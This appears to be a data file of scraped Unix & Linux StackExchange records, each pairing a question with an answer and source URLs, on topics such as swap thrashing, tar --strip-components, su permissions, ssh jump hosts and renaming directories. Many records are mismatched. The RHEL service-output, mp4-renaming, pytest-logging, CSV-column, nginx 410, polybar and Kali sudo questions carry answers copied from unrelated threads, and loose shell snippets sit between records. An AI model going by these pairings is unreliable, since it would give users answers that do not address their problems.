534,355 | I'm using Linux 4.15, and this happens to me many times when the RAM usage reaches its top - The whole OS becomes unresponsive, frozen and useless. The only thing I see it to be working is the disk (main system partition), which is massively in use. I don't know whether this issue is OS-specific, hardware-specific, or configuration-specific. Any ideas? | What can make Linux so unresponsive? Overcommitting available RAM, which causes a large amount of swapping, can definitely do this. Remember that random access I/O on your mechanical HDD requires moving a read/write head, which can only do around 100 seeks per second. It's usual for Linux to go totally out to lunch, if you overcommit RAM "too much". I also have a spinny disk and 8GB RAM. I have had problems with a couple of pieces of software with memory leaks. I.e. their memory usage keeps growing over time and never shrinks, so the only way to control it would have been to stop the software and then restart it. Based on the experiences I had during this, I am not very surprised to hear delays over ten minutes, if you are generating 3GB+ of swap. You won't necessarily see this in all cases where you have more than 3GB of swap. Theory says the key concept is thrashing . On the other hand, if you are trying to switch between two different working sets, and it requires swapping 3GB in and out, at 100MB/s it will take at least 60 seconds even if the I/O pattern can be perfectly optimized. In practice, the I/O pattern will be far from optimal. After the difficulty I had with this, I reformatted my swap space to 2GB (several times smaller than before), so the system would not be able to swap as deeply. You can do this even without messing around resizing the partition, because mkswap takes an optional size parameter. The rough balance is between running out of memory and having processes get killed, and having the system hang for so long that you give up and reboot anyway. I don't know if a 4GB swap partition is too large; it might depend what you're doing. The important thing is to watch out for when the disk starts churning, check your memory usage, and respond accordingly. Checking memory usage of multi-process applications is difficult. To see memory usage per-process without double-counting shared memory, you can use sudo atop -R , press M and m , and look in the PSIZE column. You can also use smem . smem -t -P firefox will show PSS of all your firefox processes, followed by a line with total PSS. This is the correct approach to measure total memory usage of Firefox or Chrome based browsers. (Though there are also browser-specific features for showing memory usage, which will show individual tabs). | {
"source": [
"https://unix.stackexchange.com/questions/534355",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/228308/"
]
} |
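The inspection and swap-resizing steps mentioned above can be sketched roughly as follows; /dev/sdXN is a placeholder for the real swap partition, the 2 GiB figure is just the example used in the answer, and everything after the first three commands needs root:
#!/bin/sh
# Check how much swap is in use and which processes are heavy before deciding.
free -h
swapon --show                 # newer util-linux; "cat /proc/swaps" works everywhere
smem -t -P firefox            # per-process PSS, if smem is installed

# Recreate a smaller swap area so the machine cannot thrash as deeply.
swapoff /dev/sdXN             # needs enough free RAM to absorb what is swapped out
mkswap /dev/sdXN 2097152      # optional size argument in 1 KiB blocks (about 2 GiB)
swapon /dev/sdXN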
534,360 | Sorry for this very basic question. I work in a very small company as a developer and we are trying to help the infra team to setup a new environment. We are migrating from RHEL 5 32bits to RHEL 7 64 bists. We could install and parametrize properly the installation of SSH. Everything works except what I will call 'output tag' when we stop, start or restart the service. See photo below for a better understanding. I mean the [OK], [FAILED] that appears on the screen after using service sshd restart for example. The photo is just an example showing the tags. On RHEL 5 it works flawless. On RHEL 7 it works but I do NOT have the same output ([OK], [FAILED], etc) I think I am missing something. Did searches on google but could not find anything related to that. | What can make Linux so unresponsive? Overcommitting available RAM, which causes a large amount of swapping, can definitely do this. Remember that random access I/O on your mechanical HDD requires moving a read/write head, which can only do around 100 seeks per second. It's usual for Linux to go totally out to lunch, if you overcommit RAM "too much". I also have a spinny disk and 8GB RAM. I have had problems with a couple of pieces of software with memory leaks. I.e. their memory usage keeps growing over time and never shrinks, so the only way to control it would have been to stop the software and then restart it. Based on the experiences I had during this, I am not very surprised to hear delays over ten minutes, if you are generating 3GB+ of swap. You won't necessarily see this in all cases where you have more than 3GB of swap. Theory says the key concept is thrashing . On the other hand, if you are trying to switch between two different working sets, and it requires swapping 3GB in and out, at 100MB/s it will take at least 60 seconds even if the I/O pattern can be perfectly optimized. In practice, the I/O pattern will be far from optimal. After the difficulty I had with this, I reformatted my swap space to 2GB (several times smaller than before), so the system would not be able to swap as deeply. You can do this even without messing around resizing the partition, because mkswap takes an optional size parameter. The rough balance is between running out of memory and having processes get killed, and having the system hang for so long that you give up and reboot anyway. I don't know if a 4GB swap partition is too large; it might depend what you're doing. The important thing is to watch out for when the disk starts churning, check your memory usage, and respond accordingly. Checking memory usage of multi-process applications is difficult. To see memory usage per-process without double-counting shared memory, you can use sudo atop -R , press M and m , and look in the PSIZE column. You can also use smem . smem -t -P firefox will show PSS of all your firefox processes, followed by a line with total PSS. This is the correct approach to measure total memory usage of Firefox or Chrome based browsers. (Though there are also browser-specific features for showing memory usage, which will show individual tabs). | {
"source": [
"https://unix.stackexchange.com/questions/534360",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/365938/"
]
} |
535,772 | I want to make sure I understand the following code: tar xvzf FILE --exclude-from=exclude.me --strip-components 1 -C DESTINATION which was posted in this answer . From man tar : --strip-components=NUMBER strip NUMBER leading components from file names on extraction -C , --directory=DIR change to directory DIR I didn't understand the manual explanation for --strip-components . About -C , I understood that it means something like "put stripped components in a noted directory." What does --strip-components -C mean? | The fragment of manpage you included in your question comes from man
for GNU tar. GNU is a software project that prefers info manuals
over manpages. In fact, tar manpage has been added to the GNU tar
source code tree only in
2014 and it still is just a reference, not a full-blown manual with
examples. You can invoke a full info manual with info tar , it's
also available online here . It contains
several examples of --strip-components usage, the relevant fragments
are: --strip-components=number Strip given number of leading components from file names before extraction. For example, if archive `archive.tar' contained `some/file/name', then running tar --extract --file archive.tar --strip-components=2 would extract this file to file `name'. and: --strip-components=number Strip given number of leading components from file names before extraction. For example, suppose you have archived whole `/usr' hierarchy to a tar archive named `usr.tar'. Among other files, this archive contains `usr/include/stdlib.h', which you wish to extract to the current working directory. To do so, you type: $ tar -xf usr.tar --strip=2 usr/include/stdlib.h The option `--strip=2' instructs tar to strip the two leading components (`usr/' and `include/') off the file name. That said; There are other implementations of tar out there, for example FreeBSD
tar manpage has a
different explanation of this command: --strip-components count Remove the specified number of leading path elements. Pathnames
with fewer elements will be silently skipped. Note that the
pathname is edited after checking inclusion/exclusion patterns
but before security checks. In other words, you should understand a Unix path as a sequence of
elements separated by / (unless there is only one / ). Here is my own example (other examples are available in the info manual I linked to above): Let's create a new directory structure: mkdir -p a/b/c Path a/b/c is composed of 3 elements: a , b , and c . Create an empty file in this directory and put it into .tar archive: $ touch a/b/c/FILE
$ tar -cf archive.tar a/b/c/FILE FILE is a 4th element of a/b/c/FILE path. List contents of archive.tar: $ tar tf archive.tar
a/b/c/FILE You can now extract archive.tar with --strip-components and an
argument that will tell it how many path elements you want to be removed from the a/b/c/FILE when extracted. Remove an original a directory: rm -r a Extract with --strip-components=1 - only a has not been recreated: $ tar xf archive.tar --strip-components=1
$ ls -Al
total 16
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar
drwxr-xr-x 3 ja users 4096 Mar 26 15:43 b
$ tree b
b
└── c
└── FILE
1 directory, 1 file With --strip-components=2 you see that a/b - 2 elements have not
been recreated: $ rm -r b
$ tar xf archive.tar --strip-components=2
$ ls -Al
total 16
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar
drwxr-xr-x 2 ja users 4096 Mar 26 15:46 c
$ tree c
c
└── FILE
0 directories, 1 file With --strip-components=3 3 elements a/b/c have not been recreated
and we got FILE in the same level directory in which we run tar : $ rm -r c
$ tar xf archive.tar --strip-components=3
$ ls -Al
total 12
-rw-r--r-- 1 ja users 0 Mar 26 15:39 FILE
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar -C option tells tar to change to a given directory before running a
requested operation, extracting but also archiving. In this
comment you asked: Asking tar to do cd: why cd? I mean to ask, why it's not just mv? Why do you think that mv is better? To what directory would you like
to extract tar archive first: /tmp - what if it's missing or full? "$TMPDIR" - what if it's unset, missing or full? current directory - what if user has no w permission, just r and x ? what if a temporary directory, whatever it is already contained
files with the same names as in tar archive and extracting would
overwrite them? what if a temporary directory, whatever it is didn't support Unix
filesystems and all info about ownership, executable bits etc. would
be lost? Also notice that -C is a common change directory option in other
programs as well, Git and make are first that come to my
mind. | {
"source": [
"https://unix.stackexchange.com/questions/535772",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/-1/"
]
} |
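To tie the two options from the question together, a minimal sketch looks like this; FILE.tar.gz and DESTINATION are placeholders, and the archive is assumed to contain a single top-level directory:
#!/bin/sh
# -C switches into DESTINATION first, then --strip-components=1 removes the
# archive's top-level directory from every member name on extraction.
mkdir -p DESTINATION
tar -xvzf FILE.tar.gz -C DESTINATION --strip-components=1
# a member stored as "project-1.0/src/main.c" ends up as "DESTINATION/src/main.c"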
535,777 | I have a folder called movies on my Ubuntu, which contains many subfolders. Each subfolder contains 1 mp4 file and may contain other files (jpg, srt). Each subfolder has the same title format: My Subfolder 1 (2001) Bla Bla
My Subfolder 2 (2000) Bla
My Subfolder 3 (1999) How can I rename the mp4 files same as parent folder but without the year and the blabla? For example, the mp4s inside the subfolders above become : My Subfolder 1.mp4
My Subfolder 2.mp4
My Subfolder 3.mp4 I want the mp4s to stay in their subfolder, just their name will be changed. The year is always in parentheses. | The fragment of manpage you included in your question comes from man
for GNU tar. GNU is a software project that prefers info manuals
over manpages. In fact, tar manpage has been added to the GNU tar
source code tree only in
2014 and it still is just a reference, not a full-blown manual with
examples. You can invoke a full info manual with info tar , it's
also available online here . It contains
several examples of --strip-components usage, the relevant fragments
are: --strip-components=number Strip given number of leading components from file names before extraction. For example, if archive `archive.tar' contained `some/file/name', then running tar --extract --file archive.tar --strip-components=2 would extract this file to file `name'. and: --strip-components=number Strip given number of leading components from file names before extraction. For example, suppose you have archived whole `/usr' hierarchy to a tar archive named `usr.tar'. Among other files, this archive contains `usr/include/stdlib.h', which you wish to extract to the current working directory. To do so, you type: $ tar -xf usr.tar --strip=2 usr/include/stdlib.h The option `--strip=2' instructs tar to strip the two leading components (`usr/' and `include/') off the file name. That said; There are other implementations of tar out there, for example FreeBSD
tar manpage has a
different explanation of this command: --strip-components count Remove the specified number of leading path elements. Pathnames
with fewer elements will be silently skipped. Note that the
pathname is edited after checking inclusion/exclusion patterns
but before security checks. In other words, you should understand a Unix path as a sequence of
elements separated by / (unless there is only one / ). Here is my own example (other examples are available in the info manual I linked to above): Let's create a new directory structure: mkdir -p a/b/c Path a/b/c is composed of 3 elements: a , b , and c . Create an empty file in this directory and put it into .tar archive: $ touch a/b/c/FILE
$ tar -cf archive.tar a/b/c/FILE FILE is a 4th element of a/b/c/FILE path. List contents of archive.tar: $ tar tf archive.tar
a/b/c/FILE You can now extract archive.tar with --strip-components and an
argument that will tell it how many path elements you want to be removed from the a/b/c/FILE when extracted. Remove an original a directory: rm -r a Extract with --strip-components=1 - only a has not been recreated: $ tar xf archive.tar --strip-components=1
$ ls -Al
total 16
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar
drwxr-xr-x 3 ja users 4096 Mar 26 15:43 b
$ tree b
b
└── c
└── FILE
1 directory, 1 file With --strip-components=2 you see that a/b - 2 elements have not
been recreated: $ rm -r b
$ tar xf archive.tar --strip-components=2
$ ls -Al
total 16
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar
drwxr-xr-x 2 ja users 4096 Mar 26 15:46 c
$ tree c
c
└── FILE
0 directories, 1 file With --strip-components=3 3 elements a/b/c have not been recreated
and we got FILE in the same level directory in which we run tar : $ rm -r c
$ tar xf archive.tar --strip-components=3
$ ls -Al
total 12
-rw-r--r-- 1 ja users 0 Mar 26 15:39 FILE
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar -C option tells tar to change to a given directory before running a
requested operation, extracting but also archiving. In this
comment you asked: Asking tar to do cd: why cd? I mean to ask, why it's not just mv? Why do you think that mv is better? To what directory would you like
to extract tar archive first: /tmp - what if it's missing or full? "$TMPDIR" - what if it's unset, missing or full? current directory - what if user has no w permission, just r and x ? what if a temporary directory, whatever it is already contained
files with the same names as in tar archive and extracting would
overwrite them? what if a temporary directory, whatever it is didn't support Unix
filesystems and all info about ownership, executable bits etc. would
be lost? Also notice that -C is a common change directory option in other
programs as well, Git and make are first that come to my
mind. | {
"source": [
"https://unix.stackexchange.com/questions/535777",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/367197/"
]
} |
535,936 | I have a headless server that is logged into remotely by multiple users. None of the other users are in the sudoers file, so they cannot obtain root via sudo . However, since the permissions on su are -rwsr-xr-x there's nothing stopping them from attempting to brute force the root password. One could argue that if a user knows the root password they can compromise the system anyway, but I don't think this is the case. OpenSSH is configured with PermitRootLogin no and PasswordAuthentication no , and none of the other users have physical access to the server. As far as I can tell, the world execute permission on /usr/bin/su is the only avenue for users attempting to gain root on my server. What's further puzzling to me in that it doesn't even seem useful. It allows me to run su directly instead of needing to do sudo su , but this is hardly an inconvenience. Am I overlooking something? Is the world execute permission on su just there for historic reasons? Are there any downsides to removing that permission that I haven't encountered yet? | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535936",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/100178/"
]
} |
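The same "act as another user" use of su can also run a single command instead of an interactive shell; a sketch, with mike kept as the example account from the answer:
#!/bin/sh
# Run one command in mike's login environment (his password is still required).
su -l mike -c 'id; echo "HOME is $HOME"'

# With sudo rights the target user's password is not needed:
sudo su -l mike -c 'id'
sudo -u mike -i id            # shorter equivalent on most systems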
535,939 | How can I output the command itself in addition to its output to a file? I know that I can do how to output text to both screen and file inside a shell script? to capture the output. My use case is specific to pytest. pytest /awesome_tests -k test_quick_tests -n auto &> test_output_$(date -u +"%FT%H%MZ").txt It would be really helpful to have the command executed in the output so I knew specifically what the results were for. | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535939",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/24192/"
]
} |
535,941 | I have a csv file: test_1,2,data,hi,cat
test_2,3,4,5,6
test_1,3,7,8,9 I want to delete column 3 of the rows which begin with test_1 . I used the cut command to delete column 3 but I do not know how to do it only for a row that begins with test_1 . | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535941",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/367383/"
]
} |
535,947 | I'm trying to configure nginx to return a http 410 ("Resource Gone") code for any path under / My config is below. With this config, if I request /410test, I get a standard nginx 404 Not Found page, and a response status code of 404. So I'm having trouble even getting a response of 410 for one specific path, much less, all paths. user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
server {
location /410test {
return 410 "this is my 410 test page";
}
}
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
include /etc/nginx/mime.types;
default_type application/octet-stream;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
gzip on;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
} | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535947",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/367391/"
]
} |
535,961 | I'm trying to compile polybar , and I get a long compilation error which is related to xcb (apparently), I have the log file here ; I've read through the polybar wiki and I came upon the solution of downgrading xcb-proto to 1.11 , and so I followed through with the process, although I'm not really sure how to check ther version (the logs tell me that each X-extension has version 1.13 though?) Nonetheless I've tried compiling with both Clang and GCC using build.sh , all to no avail, my question is how I can downgrade packages: -- [X] xcb-randr (1.13.1)
-- [X] xcb-randr (monitor support) (1.13.1)
-- [X] xcb-composite (1.13.1)
-- [X] xcb-xkb (1.13.1)
[...] to version 1.11? EDIT I have tried to remove the libxcb* packages from my Debian, and before I wrote yes on the prompt to continue I noticed it would make redundant a lot of packages that would otherwise be beneficial to my system, so I don't see how I can hotplug a downgrade without removing the packages I want to downgrade to begin with. | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535961",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/367221/"
]
} |
537,319 | I want to download files from my office computer to my laptop. I can connect my office machine by SSH to the organization server and then SSH from the server to my office machine. The only commands the organization server accepts are ssh, ssh1, and ssh2. How can I download a file from my office (remote) machine through the server into my laptop (local) machine? | The previous answers mention how to use the ProxyJump directive (added in OpenSSH 7.3) to connect through an intermediate server (usually referred to as the bastion host), but mention it just as a command line argument. Unless it is a machine you won't be connecting in the future, the best thing is that you configure it on ~/.ssh/config . I would put a file like: Host office-machine
Hostname yochay-machine.internal.company.local
ProxyJump bastion-machine
Host bastion-machine
Hostname organization-server.company.com
... If you are using an earlier version of OpenSSH which doesn't support ProxyJump, you would replace it with the equivalent: ProxyCommand ssh -W %h:%p bastion-machine and if your local ssh version was a really ancient one that didn't support -W : ssh bastion-machine nc %h %p although this last one requires that the bastion machine has nc installed. The beauty of ssh is that you can configure each destination on the file, and they will stack very nicely. Thus you end up working with office-machine as the hostname on all the tools (ssh, scp, sftp...) as they were direct connects, and they will figure out how to connect based in the ssh_config. You could also have wildcards like Host *.internal.company.local to make all hosts ending like that going through a specific bastion, and it will apply to all of them. Once configured correctly, the only difference between doing one hop connections or twenty would be the slower connection times. | {
"source": [
"https://unix.stackexchange.com/questions/537319",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/318266/"
]
} |
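With the ~/.ssh/config entries above in place, the actual file download the question asks about becomes an ordinary scp or rsync call; office-machine and bastion-machine are the aliases from the answer, and the paths are placeholders:
#!/bin/sh
# Copy a single file from the office machine, tunnelling through the bastion.
scp office-machine:/home/you/report.pdf ~/Downloads/

# Whole directories, with progress and the ability to resume:
rsync -av -e ssh office-machine:/home/you/results/ ~/Downloads/results/

# One-off alternative without editing the config (OpenSSH 7.3 or later):
scp -o ProxyJump=bastion-machine office-machine:/home/you/report.pdf .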
537,413 | Sorry if this has an answer elsewhere, I've no idea how to search for my problem. I was running some simulations on a redhat linux HPC server, and my code for handling the folder structure to save the output had an unfortunate bug. My matlab code to create the folder was: folder = [sp.saveLocation, 'run_', sp.run_number, '/']; where sp.run_number was an integer. I forgot to convert it to a string, but for some reason running mkdir(folder); (in matlab) still succeeded. In fact, the simulations ran without a hitch, and the data got saved to the matching directory. Now, when the folder structure is queried/printed I get the following situations: When I try to tab autocomplete: run_ run_^A/ run_^B/ run_^C/ run_^D/ run_^E/ run_^F/ run_^G/ run_^H/ run_^I/ When I use ls : run_ run_? run_? run_? run_? run_? run_? run_? run_? run_? run_? . When I transfer to my mac using rsync the --progress option shows: run_\#003/ etc. with (I assume) the number matching the integer in sp.run_number padded to three digits, so the 10th run is run_\#010/ When I view the folders in finder I see run_ run_ run_ run_ run_ run_ run_ run_ run_ run_? Looking at this question and using the command ls | LC_ALL=C sed -n l I get: run_$
run_\001$
run_\002$
run_\003$
run_\004$
run_\005$
run_\006$
run_\a$
run_\b$
run_\t$
run_$ I can't manage to cd into the folders using any of these representations. I have thousands of these folders, so I'll need to fix this with a script.
Which of these options is the correct representation of the folder? How can I programmatically refer to these folders so I rename them with a properly formatted name using a bash script? And I guess for the sake of curiosity, how in the hell did this happen in the first place? | You can use the perl rename utility (aka prename or file-rename ) to rename the directories. NOTE: This is not to be confused with rename from util-linux , or any other version. rename -n 's/([[:cntrl:]])/ord($1)/eg' run_*/ This uses perl's ord() function to replace each control-character in the filename with the ordinal number for that character. e.g ^A becomes 1, ^B becomes 2, etc. The -n option is for a dry-run to show what rename would do if you let it. Remove it (or replace it with -v for verbose output) to actually rename. The e modifier in the s/LHS/RHS/eg operation causes perl to execute the RHS (the replacement) as perl code, and the $1 is the matched data (the control character) from the LHS. If you want zero-padded numbers in the filenames, you could combine ord() with sprintf() . e.g. $ rename -n 's/([[:cntrl:]])/sprintf("%02i",ord($1))/eg' run_*/ | sed -n l
rename(run_\001, run_01)$
rename(run_\002, run_02)$
rename(run_\003, run_03)$
rename(run_\004, run_04)$
rename(run_\005, run_05)$
rename(run_\006, run_06)$
rename(run_\a, run_07)$
rename(run_\b, run_08)$
rename(run_\t, run_09)$ The above examples work if and only if sp.run_number in your matlab script was in the range of 0..26 (so it produced control-characters in the directory names). To deal with ANY 1-byte character (i.e. from 0..255), you'd use: rename -n 's/run_(.)/sprintf("run_%03i",ord($1))/e' run_*/ If sp.run_number could be > 255, you'd have to use perl's unpack() function instead of ord() . I don't know exactly how matlab outputs an unconverted int in a string, so you'll have to experiment. See perldoc -f unpack for details. e.g. the following will unpack both 8-bit and 16-bit unsigned values and zero-pad them to 5 digits wide: rename -n 's/run_(.*)/sprintf("run_%05i",unpack("SC",$1))/e' run_*/ | {
"source": [
"https://unix.stackexchange.com/questions/537413",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/128396/"
]
} |
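If perl's rename is not available, roughly the same renaming can be done in plain bash; this sketch assumes the directories really are named run_ plus one stray character, and it only echoes the mv commands until you remove the echo:
#!/bin/bash
for d in run_*/; do
    d=${d%/}                       # drop the trailing slash
    ch=${d#run_}                   # whatever follows "run_"
    [ ${#ch} -eq 1 ] || continue   # skip names that don't fit the pattern
    printf -v num '%03d' "'$ch"    # leading quote: numeric value of that character
    echo mv -- "$d" "run_$num"
done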
537,707 | I have a text file on Linux where the contents are like below: help.helloworld.com:latest.world.com
dev.helloworld.com:latest.world.com I want to get the contents before the colon like below: help.helloworld.com
dev.helloworld.com How can I do that within the terminal? | This is what cut is for: $ cat file
help.helloworld.com:latest.world.com
dev.helloworld.com:latest.world.com
foo:baz:bar
foo
$ cut -d: -f1 file
help.helloworld.com
dev.helloworld.com
foo
foo You just set the delimiter to : with -d: and tell it to only print the 1st field ( -f1 ). | {
"source": [
"https://unix.stackexchange.com/questions/537707",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/368488/"
]
} |
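Two equivalent ways of doing the same thing, in case the surrounding code is already awk or a shell loop; file.txt is the sample file from the question:
#!/bin/sh
awk -F: '{print $1}' file.txt          # same result as cut -d: -f1

# Pure shell, useful inside an existing read loop:
while IFS= read -r line; do
    printf '%s\n' "${line%%:*}"        # delete the first ":" and everything after it
done < file.txt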
538,397 | I want a way to run a command randomly, say 1 out of 10 times. Is there a builtin or GNU coreutil to do this, ideally something like: chance 10 && do_stuff where do_stuff is only executed 1 in 10 times? I know I could write a script, but it seems like a fairly simple thing and I was wondering if there is a defined way. | In ksh , Bash, Zsh, Yash or BusyBox sh : [ "$RANDOM" -lt 3277 ] && do_stuff The RANDOM special variable of the Korn, Bash, Yash, Z and BusyBox shells produces a pseudo-random decimal integer value between 0 and 32767 every time it’s evaluated, so the above gives (close to) a one-in-ten chance. You can use this to produce a function which behaves as described in your question, at least in Bash: function chance {
[[ -z $1 || $1 -le 0 ]] && return 1
[[ $RANDOM -lt $((32767 / $1 + 1)) ]]
} Forgetting to provide an argument, or providing an invalid argument, will produce a result of 1, so chance && do_stuff will never do_stuff . This uses the general formula for “1 in n ” using $RANDOM , which is [[ $RANDOM -lt $((32767 / n + 1)) ]] , giving a (⎣32767 / n ⎦ + 1) in 32768 chance. Values of n which aren’t factors of 32768 introduce a bias because of the uneven split in the range of possible values. | {
"source": [
"https://unix.stackexchange.com/questions/538397",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/226063/"
]
} |
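A shorter arithmetic variant of the same idea, as a sketch; like the version above it carries a small bias, because 32768 is not an exact multiple of most arguments:
#!/bin/bash
chance() {
    [ "${1:-0}" -gt 0 ] || return 1    # refuse missing or non-positive arguments
    (( RANDOM % $1 == 0 ))             # true roughly 1 time in $1
}

chance 10 && echo "ran the 1-in-10 branch"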
538,409 | I have installed kali linux through linux deploy on my android phone. When I try to ssh into the kali linux it asks for password. If I give the password which was entered before installing kali linux then it says "Password incorrect". I can VNC through that password but can't connect to ssh and also can't get root access. When I type sudo it says sudo: PERM ROOT: setresuid(0,-1,-1): Permission denied
sudo: unable to initialize policy plugin. And also I can’t install any packages through apt-get install . I am new to linux kindly help!!! | In ksh , Bash, Zsh, Yash or BusyBox sh : [ "$RANDOM" -lt 3277 ] && do_stuff The RANDOM special variable of the Korn, Bash, Yash, Z and BusyBox shells produces a pseudo-random decimal integer value between 0 and 32767 every time it’s evaluated, so the above gives (close to) a one-in-ten chance. You can use this to produce a function which behaves as described in your question, at least in Bash: function chance {
[[ -z $1 || $1 -le 0 ]] && return 1
[[ $RANDOM -lt $((32767 / $1 + 1)) ]]
} Forgetting to provide an argument, or providing an invalid argument, will produce a result of 1, so chance && do_stuff will never do_stuff . This uses the general formula for “1 in n ” using $RANDOM , which is [[ $RANDOM -lt $((32767 / n + 1)) ]] , giving a (⎣32767 / n ⎦ + 1) in 32768 chance. Values of n which aren’t factors of 32768 introduce a bias because of the uneven split in the range of possible values. | {
"source": [
"https://unix.stackexchange.com/questions/538409",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/369517/"
]
} |
